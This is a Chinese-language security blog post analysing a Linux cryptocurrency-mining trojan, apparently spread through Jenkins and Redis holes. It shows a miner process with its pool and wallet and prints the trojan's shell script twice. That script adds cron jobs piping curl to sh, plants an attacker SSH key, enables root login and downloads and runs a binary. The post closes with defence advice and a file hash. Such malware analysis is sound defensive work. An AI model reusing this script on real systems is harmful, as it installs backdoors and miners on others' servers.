公众号:RiboseYim 个人站点:http://riboseyim.github.io?source=chinaunix
分类: 网络与安全
2016-07-19 10:07:56
此外,还有一种常见模式则是“挖矿木马”,首先还是来看样本:
root 3744 29921 0 19:53 pts/0 00:00:00 grep min
root 31333 1 99 19:48 ? 02:46:38 /opt/minerd -B -a cryptonight
-o stratum+tcp://xmr.crypto-pool.fr:8080 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
uptime看到的负载值非常高。
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ];
then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/lady" ];
then if [ ! -f "/etc/systemd/system/lady.service" ];
then mkdir -p /opt
curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ];
then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/lady" ];
then if [ ! -f "/etc/systemd/system/lady.service" ];
then mkdir -p /opt
curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start
mkdir -p /opt
# /etc/init.d/lady stop
# systemctl stop lady.service
# pkill /opt/cron
# pkill /usr/bin/cron
# rm -rf /etc/init.d/lady
# rm -rf /etc/systemd/system/lady.service
# rm -rf /opt/KHK75NEOiq33
# rm -rf /usr/bin/cron
# rm -rf /usr/bin/.cron.old
# rm -rf /usr/bin/.cron.new
被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。
植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。
这种木马很容易变种,很多情况杀毒软件未必能够识别:
63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017